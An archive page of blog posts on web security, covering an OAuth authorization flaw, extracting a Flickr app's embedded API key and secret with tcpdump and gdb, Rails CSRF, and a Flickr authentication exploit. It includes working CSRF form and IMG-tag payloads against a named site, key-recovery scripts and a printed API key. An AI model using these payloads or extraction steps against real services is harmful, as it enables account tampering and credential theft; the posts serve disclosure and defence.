Tag Archives: security

HDCP’s real purpose

The recent leak or crack of the HDCP key has mostly been discussed in terms of media piracy. There is already plenty of Blu-ray piracy – nobody’s going to bother capturing raw HDMI traffic and re-encoding it when they can easily buy a ripper. What this will do is make it possible for more small Chinese manufacturers to get in on the HD television manufacturing game. HDCP provided a high barrier to entry for manufacturers, so we haven’t seen the proliferation of TV manufacturers that we’ve seen in virtually every other kind of electronics. I expect that to change. I’m looking forward to buying sketchy HDTVs in Chinatown super cheap.

Understanding the OAuth vulnerability

Last night’s OAuth Security Advisory 2009.1 was a little light on the details. The blog post wasn’t much better. I was peripherally involved in the OAuth spec development, and I couldn’t work out what the advisory meant without a bunch of thinking and spec reading, so I thought I’d try to explain it in simpler terms here.

For my example I’ll use the real service Twitter and a theoretical service Twitten that lets users post to Twitter in LOL-speak and authenticates via OAuth. Alice and Bob will be my attacker and victim.

Alice’s normal authentication process goes like this:

  1. Alice loads twitten.com/login
  2. Twitten creates a regular HTTP session for Alice
  3. Twitten asks Twitter for an unauthorized token
  4. Twitten redirects Alice to a URL on the Twitter servers that will allow her to authorize the token
  5. Alice clicks OK to authorize the token
  6. Twitter redirects Alice back to Twitten
  7. Twitten exchanges its unauthorized token for an access token (associated with Alice’s account) with Twitter and stores it in Alice’s session
  8. Alice makes inane posts on Twitter via Twitten
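
To make the token handling in steps 3, 4 and 7 concrete, here’s a rough sketch of the consumer (Twitten) side in Python. The credentials and endpoint URLs are placeholders of mine, and the signing is the standard OAuth HMAC-SHA1 scheme; treat it as an illustration, not a drop-in client.

import base64, hashlib, hmac, secrets, time, urllib.parse

# Placeholder credentials and endpoints, purely illustrative.
CONSUMER_KEY = "twitten-key"
CONSUMER_SECRET = "twitten-secret"
REQUEST_TOKEN_URL = "https://twitter.com/oauth/request_token"
AUTHORIZE_URL = "https://twitter.com/oauth/authorize"
ACCESS_TOKEN_URL = "https://twitter.com/oauth/access_token"

def oauth_sign(method, url, params, consumer_secret, token_secret=""):
    """HMAC-SHA1 signature over the OAuth signature base string."""
    def enc(s):
        return urllib.parse.quote(str(s), safe="~")
    normalized = "&".join(f"{enc(k)}={enc(v)}" for k, v in sorted(params.items()))
    base_string = "&".join([method.upper(), enc(url), enc(normalized)])
    key = f"{enc(consumer_secret)}&{enc(token_secret)}"
    digest = hmac.new(key.encode(), base_string.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()

def oauth_params(extra=None):
    params = {
        "oauth_consumer_key": CONSUMER_KEY,
        "oauth_nonce": secrets.token_hex(8),
        "oauth_signature_method": "HMAC-SHA1",
        "oauth_timestamp": str(int(time.time())),
        "oauth_version": "1.0",
    }
    params.update(extra or {})
    return params

# Step 3: Twitten asks Twitter for an unauthorized (request) token.
params = oauth_params()
params["oauth_signature"] = oauth_sign("POST", REQUEST_TOKEN_URL, params, CONSUMER_SECRET)
# ...POST those params to REQUEST_TOKEN_URL; the response contains
# oauth_token and oauth_token_secret.

# Step 4: redirect Alice's browser to the authorization page for that token:
#   AUTHORIZE_URL + "?oauth_token=" + request_token

# Step 7: after Twitter redirects back, exchange the authorized token for an
# access token, signing with both the consumer secret and the token secret:
#   params = oauth_params({"oauth_token": request_token})
#   params["oauth_signature"] = oauth_sign(
#       "POST", ACCESS_TOKEN_URL, params, CONSUMER_SECRET, request_token_secret)

Note that nothing in step 7 ties the person who authorized the token in step 4 to the person who started the flow in step 1, which is exactly the gap described next.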

The vulnerability here is in step 4. If, instead of going to the authorization URL, Alice convinces Bob to go there and authorize Twitten, she can gain access to his account. Like this:

  1. Alice loads twitten.com/login
  2. Twitten creates a regular HTTP session for Alice
  3. Twitten asks Twitter for an unauthorized token
  4. Twitten tells Alice what URL to go to to authorize the token, but she doesn’t go there
  5. Alice tells Bob, “if you love Twitter and kittens try out Twitten – go to http://twitter.com/oauth/authorize/….” (the authorization URL from Twitten)
  6. Bob loads the authorization URL with his Twitter credentials and authorizes the token
  7. Twitten requests Twitter to exchange the unauthorized token for an access token (associated with Bob’s Twitter account) and stores it in Alice’s session
  8. Alice goes to twitten.com and posts “OMG PWNd” to Bob’s Twitter account

I’m not really sure how to address this issue. It’s fundamentally hard to establish trust between three parties over insecure communications. Hopefully more experienced people than me will come up with clever answers.

Update: changed wording to match Eran’s suggestion; his blog post on the subject is excellent reading.

A Different Model For Web Services Authorization

In my last post I set out to describe how easy it is to extract private keys from desktop software. As I was concluding I stumbled on an alternative approach that might be more secure in some circumstances. I didn’t really go into details, so here’s an expansion of the idea.

Current API authentication mechanisms, including Flickr Auth, OAuth, Yahoo BBAuth and Google AuthSub, work by allowing users to grant an application the right to act for the user on the site. Some implementations allow the user to grant access to only a subset of the functionality: Flickr lets users grant just read access; Google lets users grant access to just one class of data (for example, Google Docs but not Google Calendar). But still, the user doesn’t know which specific operations they’re allowing to be carried out. This wouldn’t matter so much if the user could trust the application that they’re granting access to, but there’s no way to provide for that completely.

Another approach might be to give third-party applications the ability to submit sets of changes to be applied to a user’s account, but require the user to approve them through the service provider’s web site before they’re applied to the user’s real data. For example, a Flickr upload might look like this:

  • Client makes API request flickr.transaction.create(total_files=20, total_data=20M)
  • Flickr responds with transaction id X and a maximum lifetime for the transaction
  • Flickr responds with a URL to direct the user’s browser to, where the user can:
    • associate the transaction with an account, and
    • preview, permit and commit the changes
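
As a sketch of how a client might drive an API shaped like this; apart from flickr.transaction.create, the endpoint, parameter names and response fields are all invented for illustration:

import requests  # third-party HTTP client

API_ENDPOINT = "https://api.flickr.com/services/rest/"  # illustrative

# Propose a batch of changes; nothing touches the account yet.
resp = requests.post(API_ENDPOINT, data={
    "method": "flickr.transaction.create",
    "format": "json",
    "total_files": 20,
    "total_data": "20M",
}).json()

transaction = resp["transaction"]          # hypothetical response shape
transaction_id = transaction["id"]
lifetime = transaction["max_lifetime"]     # transaction expires after this
approve_url = transaction["approve_url"]

# The client uploads its files against the transaction id, then sends the
# user to approve_url in their browser, where the service associates the
# transaction with an account and lets the user preview, permit and commit.
print(f"Review and commit transaction {transaction_id} "
      f"(valid for {lifetime}s) at {approve_url}")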

To a user this isn’t going to look or feel too different from the current Flickr upload scenario, where on completion they’re presented with a set of uploaded photos and offered the opportunity to make metadata changes.

The key advantage here from a security standpoint is that users approve actions, not applications. The challenge of clearly expressing a set of changes to a user is not small, but unlike the challenge of identifying and trusting applications, it’s solvable.

This model probably only makes sense for write-oriented sessions, and for infrequent, large write sessions (such as Flickr uploads) rather than frequent, small writes (like Twitter posting).

These ideas aren’t well thought out in my head; they’re fresh from me trying to come up with a workable model for API authentication and authorization that doesn’t depend on trusting the identity of clients. I’d really welcome feedback and ideas on how to take this forward, and feedback from implementers on the feasibility of adopting a model like this.

No More Secrets

Using secret keys to identify applications communicating across the internet has become popular as people have copied the very successful Flickr authentication API. Unfortunately people trust that they can keep these keys secret from attackers, even as they distribute applications that contain the secret keys to other people. I decided to see how hard it would be to extract the secret key and API key from Flickr’s new XULRunner-based Uploadr.

While the Uploadr is nominally open source, they don’t include the key in the source code. In the README they instruct anyone building it to acquire their own key and modify the source code to include that key:

You'll need your own API key and secret from Flickr to build Uploadr.
These can be obtained at http://flickr.com/services/api/.  The key
and secret must be placed in flKey.cpp as indicated.  This file is at:
  UPLOADR/MacUploadr.app/Contents/Resources/components/flKey.cpp

The API key is stored as a string.  The secret is stored as individual
characters so it is not easily readable from the binary.

Such noble goals.

Getting the API key was as simple as running tcpdump:

sudo tcpdump -i en1 -vvv -n -s 0 -w /tmp/DumpFile.dmp

running the Uploadr, and then looking through the dump file to find where the API key is passed. Look:

api_key=a5c4c07991a15c6b56b88005a76e7774
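
If you’d rather not eyeball the capture, a few lines of Python will pull the key out of the raw dump file, since the HTTP request is sitting in there as plain text (a sketch, assuming the dump path from the tcpdump command above):

import re

# The HTTP payload is stored verbatim inside the pcap file, so a simple
# byte-level scan is enough to find the 32-hex-digit API key.
with open("/tmp/DumpFile.dmp", "rb") as capture:
    data = capture.read()

for match in re.finditer(rb"api_key=([0-9a-f]{32})", data):
    print(match.group(1).decode())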

In theory getting the secret key is harder, but it turned out to be even easier. It’s stored in the source code for the flKey::Sign method:

	// The shared secret
#ifdef XP_MACOSX
	bytes[0] = '-';
	bytes[1] = '-';
	bytes[2] = '-';
	bytes[3] = '-';
	bytes[4] = '-';
	bytes[5] = '-';
	bytes[6] = '-';
	bytes[7] = '-';
	bytes[8] = '-';
	bytes[9] = '-';
	bytes[10] = '-';
	bytes[11] = '-';
	bytes[12] = '-';
	bytes[13] = '-';
	bytes[14] = '-';
	bytes[15] = '-';
#endif

All I need to do is find that code, disassemble it and reassemble the string. I ran the Uploadr under gdb:

gdb '/Applications/Flickr Uploadr.app/Contents/MacOS/xulrunner'

and once it was up and running I tried to find something to break on that would expose the secret key. There weren’t symbols for the flKey::Sign method that’s defined in the source file, but I found I could break on MD5Init, which is called from that function. So:

break MD5Init
kill
run

And now I stop in the middle of the signature function – and from the stack trace I can see where flKey::Sign begins:

Breakpoint 1, 0x149a086b in MD5Init ()
(gdb) where
#0  0x149a086b in MD5Init ()
#1  0x149a1588 in flKey::Sign ()
#2  0x017bb45d in NS_InvokeByIndex_P ()
...

All I have to do is disassemble flKey::Sign:

(gdb) disassemble 0x149a1588
Dump of assembler code for function _ZN5flKey4SignERK9nsAStringRS0_:
0x149a1498 <_ZN5flKey4SignERK9nsAStringRS0_+0>:	push   %ebp
0x149a1499 <_ZN5flKey4SignERK9nsAStringRS0_+1>:	mov    %esp,%ebp
0x149a149b <_ZN5flKey4SignERK9nsAStringRS0_+3>:	push   %edi
0x149a149c <_ZN5flKey4SignERK9nsAStringRS0_+4>:	push   %esi
...
0x149a153e <_ZN5flKey4SignERK9nsAStringRS0_+166>:	movb   $0xXX,(%eax)
0x149a1541 <_ZN5flKey4SignERK9nsAStringRS0_+169>:	movb   $0xXX,0x1(%eax)
0x149a1545 <_ZN5flKey4SignERK9nsAStringRS0_+173>:	movb   $0xXX,0x2(%eax)
0x149a1549 <_ZN5flKey4SignERK9nsAStringRS0_+177>:	movb   $0xXX,0x3(%eax)
0x149a154d <_ZN5flKey4SignERK9nsAStringRS0_+181>:	movb   $0xXX,0x4(%eax)
0x149a1551 <_ZN5flKey4SignERK9nsAStringRS0_+185>:	movb   $0xXX,0x5(%eax)
0x149a1555 <_ZN5flKey4SignERK9nsAStringRS0_+189>:	movb   $0xXX,0x6(%eax)
0x149a1559 <_ZN5flKey4SignERK9nsAStringRS0_+193>:	movb   $0xXX,0x7(%eax)
0x149a155d <_ZN5flKey4SignERK9nsAStringRS0_+197>:	movb   $0xXX,0x8(%eax)
0x149a1561 <_ZN5flKey4SignERK9nsAStringRS0_+201>:	movb   $0xXX,0x9(%eax)
0x149a1565 <_ZN5flKey4SignERK9nsAStringRS0_+205>:	movb   $0xXX,0xa(%eax)
0x149a1569 <_ZN5flKey4SignERK9nsAStringRS0_+209>:	movb   $0xXX,0xb(%eax)
0x149a156d <_ZN5flKey4SignERK9nsAStringRS0_+213>:	movb   $0xXX,0xc(%eax)
0x149a1571 <_ZN5flKey4SignERK9nsAStringRS0_+217>:	movb   $0xXX,0xd(%eax)
0x149a1575 <_ZN5flKey4SignERK9nsAStringRS0_+221>:	movb   $0xXX,0xe(%eax)
0x149a1579 <_ZN5flKey4SignERK9nsAStringRS0_+225>:	movb   $0xXX,0xf(%eax)
...
0x149a168e <_ZN5flKey4SignERK9nsAStringRS0_+502>:	pop    %esi
0x149a168f <_ZN5flKey4SignERK9nsAStringRS0_+503>:	pop    %edi
0x149a1690 <_ZN5flKey4SignERK9nsAStringRS0_+504>:	pop    %ebp
0x149a1691 <_ZN5flKey4SignERK9nsAStringRS0_+505>:	ret
End of assembler dump.

And sure enough if I reconstruct those bytes, the secret key is: REDACTEDREDACTED
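
Reassembling the bytes by hand is tedious, so for what it’s worth, something like this (a sketch that parses gdb disassembly saved to a file; the immediates above are shown redacted as 0xXX) rebuilds the string in offset order:

import re

# Matches lines like:
#   movb   $0x61,(%eax)      -> offset 0
#   movb   $0x62,0x1(%eax)   -> offset 1
MOVB = re.compile(r"movb\s+\$0x([0-9a-fA-F]{2}),(?:0x([0-9a-fA-F]+))?\(%eax\)")

def recover_secret(disassembly: str) -> str:
    secret = {}
    for value, offset in MOVB.findall(disassembly):
        secret[int(offset or "0", 16)] = chr(int(value, 16))
    return "".join(secret[i] for i in sorted(secret))

with open("disassembly.txt") as f:  # gdb's "disassemble" output saved to a file
    print(recover_secret(f.read()))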

That wasn’t too hard, was it? The fact that the code around the key was open source made it easier to find, but even if it were closed source, knowing what kind of algorithm to look for would make it easy enough to find and examine. It’s pretty easy to trace forward from user input or backward from network I/O to find the signature algorithm, and the secret is always an input to that.

Unfortunately OAuth follows the same model as Flickr, placing some value in a consumer’s “private” key. The spec does mention in Appendix B.7 that it’s often possible for attackers to access the secret, yet it’s still a vital part of the protocol.

Since it’s not possible to securely identify clients, we should move to a model where users approve actions against their accounts rather than granting clients carte blanche. For example, Flickr could put uploaded photos into a staging area and require approval on the web site before including them in a user’s photo stream. This would allow users to make informed decisions about third-party access to their accounts.

Updated: at Flickr’s request I’ve removed the “secret” key.

Updated again: I made another post about this topic, expanding on the final paragraph of this post.

Insecurity is Ruby on Rails Best Practice

Update: This post is really really out of date. Please disregard most of what’s written here.

Ruby on Rails by default encourages developers to develop insecure web applications. While it’s certainly possible to develop secure sites using the Rails framework, you need to be aware of the issues at hand, and many of the technologies that make Rails a powerful, easy-to-use platform will work against you.

Cross Site Request Forgery
CSRF is the new bad guy in web application security. Everyone has worked out how to protect their SQL database from malicious input, and RoR saves you from ever having to worry about this. Cross site scripting attacks are dying and the web community even managed to nip most JSON data leaks in the bud.

Cross Site Request Forgery is very simple. A malicious site asks the user’s browser to carry out an action on a site that the user has an active session on, and the victim site carries out that action, believing that the user intended it. In other words, the problem arises when a web application relies purely on session cookies to authenticate requests.

Let’s look at a simple example. I want my site to add me to your 37Signals Highrise contact list.

37 Signals Highrise
Working out how to do this is pretty simple. I go to Highrise and take a look at the “Add a person” form in Firebug or using View Source. It’s a fairly straightforward form that submits to http://ianloic.highrisehq.com/people and has a bunch of fields. I can easily recreate that form on my own server. Since Highrise uses a different domain for each user I ask the user to enter their domain name. I use the same username I use everywhere else so it should be pretty easy to fool my user into giving me their Highrise domain name. Most other sites do not have unique per-user URLs.

The page is here and the source is here. Provided you’re logged in and you enter your Highrise domain correctly, clicking “Add me” will add my name to your contacts list, because 37signals’ servers have no idea that the request is not coming from their application.

It’s fairly straightforward to modify a form like this to automatically submit on page load. It’s pretty easy to put it in a hidden IFRAME so the user doesn’t even know what’s going on.

By using a unique per-user URL, the guys at 37signals have made this exploit non-trivial. This is not the default behavior of the Ruby on Rails framework. By default, action URLs are very predictable. For example, if we take a look at the social bookmarking site Magnolia we see predictable URLs all over the place.

Magnolia
As soon as you log in to Magnolia you are presented with a form for adding a bookmark by typing in its URL. This is a fantastic user experience. Unfortunately for Magnolia’s users, anyone who submits this form on their behalf can add bookmarks, and the form’s action (http://ma.gnolia.com/bookmarks/quicksave) is the same for all users. A trivial page that adds a bookmark to a visitor’s Magnolia account would look like this (try it):

<html>
    <head><title>Ma.gnolia</title></head>
    <body onload="document.getElementById('f').submit()">
        <form id="f" method="post"
                action="http://ma.gnolia.com/bookmarks/quicksave">
            <input type="text" value="http://ian.mckellar.org/"
                name="url" id="url" type="hidden"></input>
        </form>
    </body>
</html>

But it gets even worse. Since by default Rails allows GET as well as POST submissions, you can call an action from an IMG tag (try it):

<img src="http://ma.gnolia.com/bookmarks/quicksave?url=http://ian.mckellar.org/">

Magnolia is not unique in this behavior. Unless a site’s developer has gone out of their way to prevent it, this class of attacks will affect every Rails site. Most of the popular sites I’ve looked at exhibit some vulnerabilities.

Other Rails sites I’ve looked at attempt to do their input validation in JavaScript rather than in Ruby, which leaves them open to JavaScript injection and hence XSS attacks. This is a far more serious attack that I can cover separately if there is interest.

Solutions
Easy Solutions
There aren’t any good easy solutions to this. A first step is to do referrer checking on every request and block GET requests in form actions. Simply checking the domain on the referrer may not be enough security: if there’s any chance that an attacker could post HTML somewhere in the domain, the application would be vulnerable again.
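
For illustration, the referrer check amounts to something like this (a framework-agnostic sketch; the host name and header access are placeholders, not Rails API):

from urllib.parse import urlparse

ALLOWED_HOST = "example.com"  # the application's own host

def referrer_ok(headers: dict) -> bool:
    """Only accept form posts whose Referer points back at our own host."""
    referer = headers.get("Referer", "")
    return urlparse(referer).hostname == ALLOWED_HOST

# Usage: reject any state-changing request where referrer_ok(request.headers)
# is False, and refuse to handle form actions over GET at all.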

Better Solutions
Ideally we want a shared secret between the HTML that contains the form and the Rails code in the action. We don’t want this to be accessible to third parties, so serving it as JavaScript isn’t an option. The way other platforms like Drupal achieve this is by inserting into every generated form a hidden field that contains a secret token, either unique to the current user’s current session or (for the more paranoid) also unique to the action. The action then has to check that the hidden token is correct before allowing processing to continue.

This is a pain in the arse to write by hand.
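
The shape of it is small, though. A framework-agnostic sketch of the session-scoped token variant (the names here are mine, not Drupal’s or Rails’):

import hmac, hashlib, secrets

SERVER_SECRET = secrets.token_bytes(32)  # held server-side, never sent raw

def csrf_token(session_id: str) -> str:
    """Derive a per-session token from the server-side secret."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def hidden_field(session_id: str) -> str:
    """Embed the token in every form the application generates."""
    return f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}">'

def check_request(session_id: str, submitted_token: str) -> bool:
    """Refuse to process a form action unless the token matches the session."""
    return hmac.compare_digest(csrf_token(session_id), submitted_token)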

What is really required at the Rails level is a form API that can generate and consume forms securely. In Drupal all form HTML is generated and parsed by the framework. This allows application developers to protect themselves from CSRF without even knowing they are.

There’s a plugin called Secure Action, but I’m not sure how well it works. The dependence on a static shared salt rather than a randomly generated secret in the user’s session concerns me. The way it puts the signature in the URL makes me nervous too. It’s better than nothing, though.

Flickr Authentication Security

Recently Flickr closed a little security hole I found in their API authentication. I was able to convince their servers to hand out a token to me based on a user’s cookies and the API key and secret key of an application the user had used. Then with the JSON form of the Flickr API I had full access to the user’s account.

There were two flaws in Flickr’s security that exposed this problem. The first was that the security was based on the assumption that applications can keep a key secret. This is easy for web applications that make server-to-server API calls, but for anything that a user downloads, and especially for open source software, it’s impossible to keep the key secret. My experiment used the secret key from Flock, which is open source (the secret key can be found in Subversion), and the secret key from Flickr’s own Mac OS X uploader application, which can be easily extracted from the download on their site. The second was that the Flickr server was giving out new authentication tokens without requiring user approval.

The exploit itself is a little state-machine making a series of Flickr API calls and using one IFRAME. It goes like this:

  • Request a frob (via JSON)
  • Request authentication (via an IFRAME)
  • Request the auth token (via JSON)
  • Do evil (via JSON)
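
Every one of those calls, and the authorization URL loaded in the IFRAME, carries an api_sig computed from the application’s secret, which is why the extracted key and secret were all that was needed. Roughly, in Python (the actual exploit did this in browser JavaScript against the JSON API; the URLs here are illustrative):

import hashlib

API_KEY = "extracted-api-key"      # stand-ins for the extracted values
API_SECRET = "extracted-secret"
REST_URL = "https://api.flickr.com/services/rest/"   # illustrative endpoints
AUTH_URL = "https://www.flickr.com/services/auth/"

def flickr_sign(params: dict) -> str:
    """Legacy Flickr signature: MD5 of the secret followed by the sorted
    parameter names and values concatenated together."""
    joined = "".join(k + str(params[k]) for k in sorted(params))
    return hashlib.md5((API_SECRET + joined).encode()).hexdigest()

def signed_query(params: dict) -> str:
    params = dict(params, api_key=API_KEY)
    params["api_sig"] = flickr_sign(params)
    return "&".join(f"{k}={v}" for k, v in sorted(params.items()))

# Request a frob.
frob_url = REST_URL + "?" + signed_query(
    {"method": "flickr.auth.getFrob", "format": "json"})

# Point a hidden IFRAME at the authorization URL. Because the user had
# already authorized this application, Flickr handed over approval without
# asking again:
#   AUTH_URL + "?" + signed_query({"frob": frob, "perms": "write"})

# Exchange the frob for an auth token, then sign the "evil" calls with it:
#   REST_URL + "?" + signed_query(
#       {"method": "flickr.auth.getToken", "frob": frob, "format": "json"})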

In my case the evil consisted of posting a comment on the user’s most recent photo.

The security hole is now closed, but if you’re interested in seeing how to access the Flickr API entirely from JavaScript in a web page, take a look at the attached exploit: sploitr.html and the md5 library: md5.js